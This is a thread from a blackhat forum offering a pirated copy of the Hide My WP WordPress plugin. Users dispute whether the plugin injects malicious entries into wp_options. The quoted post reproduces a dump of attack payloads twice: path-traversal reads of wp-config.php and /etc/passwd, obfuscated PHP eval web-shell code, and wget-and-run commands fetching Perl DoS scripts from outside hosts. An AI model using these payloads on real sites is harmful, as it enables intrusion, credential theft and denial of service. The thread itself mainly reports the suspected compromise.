Best Blackhat Forum

Full Version: [GET] [UNTOUCHED] Hide My WP v5.6 - Amazing Security Plugin for WordPress
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7
You are rockkkkk
This plugin is effected !!

PHP Code:
download_backup_file=../wp-config.phpgform_unique_id=../../../../../,cmd=wget http://shunceng.altervista.org/irc//dos.txt ;lwp-download http://shunceng.altervista.org/irc//dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl ddos.txt ; rm -rf dos.*, shxxx=cd /tmp;wget http://chel.bit-ecol.ru/wp-includes/ID3/robots;perl robots;perl robots;perl robots;perl robots;perl robots;rm -rf robo*,cmd=wget http://suryaselindo.co.id//plugins/content/multithumb/stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; rm -rf stats*,form_id=../../, upload-dir=./../../,z=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,message=d <a href="http://cialis24h.party/#8746">buy cialis online safely</a> buy cialis online uk, #=eval("echo 10000000000-245205634;");, x=../../wp-config.php, mdocs-img-preview=../../..-/wp-config.php, data=../../..-/wp-config.php,coco=@eval(base64_decode($_POST[z0]));,filename=../../../../../../../../../etc/passwd,q071238=echo '%%%' . 'q071238' . '%%%';, calendar_id=../../../../wp-config.php,id=../../../../../../wp-config.php, src=http://free-games.top/tmp/db.php,q=/wp-config.php~,coco=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,coco=@, coco=eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));, z=@eval/**/(${\'_P\'.\'OST\'}[z9]/**/(${\'_POS\'.\'T\'}[z0]));, gform_unique_id=../../../, file=/path/wp-config.php, bot=eval("echo 10000000000-245205634;");, uploader_dir=./UmpSiX, uploader_dir=DbtXLd, uploader_dir=./ADLAyD, uploader_dir=./DVwEgu, uploader_dir=./gWAlvS, file_path=../../../../wp-config.php,bot=eval("echo 10000000000-245205634;");, fname=../../wp-config.php, chdir=./";} 


http://cialis24h.party/#8746
http://free-games.top/tmp/db.php
http://shunceng.altervista.org/irc//dos.txt
http://suryaselindo.co.id//plugins/conte.../stats.txt
http://chel.bit-ecol.ru/wp-includes/ID3/robots
(01-12-2018 02:58 AM)CreativeMedia Wrote: [ -> ]This plugin is effected !!

PHP Code:
download_backup_file=../wp-config.phpgform_unique_id=../../../../../,cmd=wget http://shunceng.altervista.org/irc//dos.txt ;lwp-download http://shunceng.altervista.org/irc//dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl ddos.txt ; rm -rf dos.*, shxxx=cd /tmp;wget http://chel.bit-ecol.ru/wp-includes/ID3/robots;perl robots;perl robots;perl robots;perl robots;perl robots;rm -rf robo*,cmd=wget http://suryaselindo.co.id//plugins/content/multithumb/stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; rm -rf stats*,form_id=../../, upload-dir=./../../,z=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,message=d <a href="http://cialis24h.party/#8746">buy cialis online safely</a> buy cialis online uk, #=eval("echo 10000000000-245205634;");, x=../../wp-config.php, mdocs-img-preview=../../..-/wp-config.php, data=../../..-/wp-config.php,coco=@eval(base64_decode($_POST[z0]));,filename=../../../../../../../../../etc/passwd,q071238=echo '%%%' . 'q071238' . '%%%';, calendar_id=../../../../wp-config.php,id=../../../../../../wp-config.php, src=http://free-games.top/tmp/db.php,q=/wp-config.php~,coco=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,coco=@, coco=eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));, z=@eval/**/(${\'_P\'.\'OST\'}[z9]/**/(${\'_POS\'.\'T\'}[z0]));, gform_unique_id=../../../, file=/path/wp-config.php, bot=eval("echo 10000000000-245205634;");, uploader_dir=./UmpSiX, uploader_dir=DbtXLd, uploader_dir=./ADLAyD, uploader_dir=./DVwEgu, uploader_dir=./gWAlvS, file_path=../../../../wp-config.php,bot=eval("echo 10000000000-245205634;");, fname=../../wp-config.php, chdir=./";} 


http://cialis24h.party/#8746
http://free-games.top/tmp/db.php
http://shunceng.altervista.org/irc//dos.txt
http://suryaselindo.co.id//plugins/conte.../stats.txt
http://chel.bit-ecol.ru/wp-includes/ID3/robots

Give me a proof about that on my file. Thanks
Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messages

I have all your plugins on my desk and I will check them all. If I found them affected too then you are doomed *(
thanks for this! reps added
(01-12-2018 03:58 AM)CreativeMedia Wrote: [ -> ]Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messages
I did and found 0 matches. Try and clean that stuff and reactivate the plugin. It's not it!
(01-12-2018 06:16 AM)bale Wrote: [ -> ]
(01-12-2018 03:58 AM)CreativeMedia Wrote: [ -> ]Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messages
I did and found 0 matches. Try and clean that stuff and reactivate the plugin. It's not it!

This plugin is creating two tables at `wp_options` and injecting code into them.

PHP Code:
pp_important_messages
trust_network_rules 
(01-12-2018 09:19 AM)CreativeMedia Wrote: [ -> ]
(01-12-2018 06:16 AM)bale Wrote: [ -> ]
(01-12-2018 03:58 AM)CreativeMedia Wrote: [ -> ]Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messages
I did and found 0 matches. Try and clean that stuff and reactivate the plugin. It's not it!

This plugin is creating two tables at `wp_options` and injecting code into them.

PHP Code:
pp_important_messages
trust_network_rules 

YOU ARE RIGHT. I TAKE MY WORDS BACK. Maybe someone with a purchased version can help to compare these.


LATER EDIT:

Manage to get a few purchased copies and its 100% something at their end. Not Chupach's fault.
I will stop update for this plugin and report this bullsh!t to Envato soon.
Someone commented on their codecanyon page. I'm curious how they respond considering they sell a security plugin.
Pages: 1 2 3 4 5 6 7
Reference URL's